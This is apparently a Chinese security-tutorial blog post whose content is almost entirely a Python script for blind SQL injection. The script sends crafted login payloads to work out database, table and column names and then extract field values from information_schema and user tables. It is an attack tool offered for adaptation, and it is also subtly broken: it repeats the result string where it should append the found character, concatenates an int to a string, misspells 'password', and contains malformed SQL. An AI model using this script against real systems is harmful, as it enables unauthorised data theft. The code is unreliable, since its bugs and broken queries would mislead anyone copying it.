從零開始學安全(三十五)●mysql 盲注手工自定義python腳本
import requests import string #mysql 手動注入 通用腳本 適用盲注 能夠跟具本身的需求更改 def home(): url="url" list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?" s=requests.session() success = "" # 成功返回的特徵 error="" #失敗返回的體徵 # 1.拿到當前鏈接數據庫長度 leng=0 i=0 while True: sql="admin%1$\\' or length(database())>"+str(i)+"#" data={"username":sql,"passwrod":1} r=s.post(url,data=data).content if error in r : leng=i i=0 break i+=1 print ("length the database:%d" %leng) #2.拿到當前鏈接數據庫名 strs='' for t in range(leng): for l in list: sql="admin%1$\\' or ascii(substr(database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break print("database is :%s" % (strs)) #3.拿當前數據庫裏面的全部表 #拿到數據庫表添加的長度 while True: sql="admin%1$\\' or select length(group_concat(table_name)) from information_schema.tables where table_type='base table' and table_schema=database()<"+i+"#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng=i i=0 break i+=1 print("length table is :%s" % (leng)) #返回全部表 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(table_name) from information_schema.tables where table_type='base table' and table_schema=database(),"+str(t)+",1))="+str(ord(l))+"#" data = {"username": sql, "passwrod": 1} r=s.post(url,data=data).content if success in r: strs+=strs break print("talbes is :%s" % (strs)) #4.選擇先要查詢的表 返回表全部字段 #返回長度 table='table'#要查找的表名 tablename = '0x' + table.encode('hex') table_name = table while True: sql = "admin%1$\\' or select length(group_concat(column_name)) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()<" + i + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if error in r: leng = i i = 0 break i += 1 print("length table is :%s" % (leng)) # 返回全部表 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema=database()," + str( t) + ",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break print("talbes is :%s" % (strs)) # 5.返回相應字段裏面的值 num=0 while True: sql = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#" data = {'username':sql,'password':1} r = s.post(url,data=data).content if error in r: num = i i=0 break i+=1 pass print("[+]number(column): %d" %(num)) # 返回長度 table = 'table' # 要查找的表名 col='user'#要返回的字段 for t in range(leng): for l in list: sql = "admin%1$\\' or ascii(substr(select "+col+" from limit 0,1 "+table_name+","+str(t)+",1))=" + str(ord(l)) + "#" data = {"username": sql, "passwrod": 1} r = s.post(url, data=data).content if success in r: strs += strs break print("talbes is :%s" % (strs))
相關文章
- 1. 從零開始學Python【3】--控制流與自定義函數
- 2. 對於python的從零開始學習(自定義函數)
- 3. 從零開始學mysql
- 4. WEB安全 ACCESS 注入、盲註腳本
- 5. MySQL從零開始學(安裝篇)
- 6. 從零開始學習python編程-從零開始學python
- 7. 【從零開始學BPM,Day3】自定義表單開發
- 8. 從零開始學python 第三天
- 9. 從零開始學JS(三)
- 10. 從零開始學Xamarin.Forms(五) 技巧
- 更多相關文章...
- • 自定義TypeHandler - MyBatis教程
- • MySQL自定義函數(CREATE FUNCTION) - MySQL教程
- • RxJava操作符(十)自定義操作符
- • PHP開發工具
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
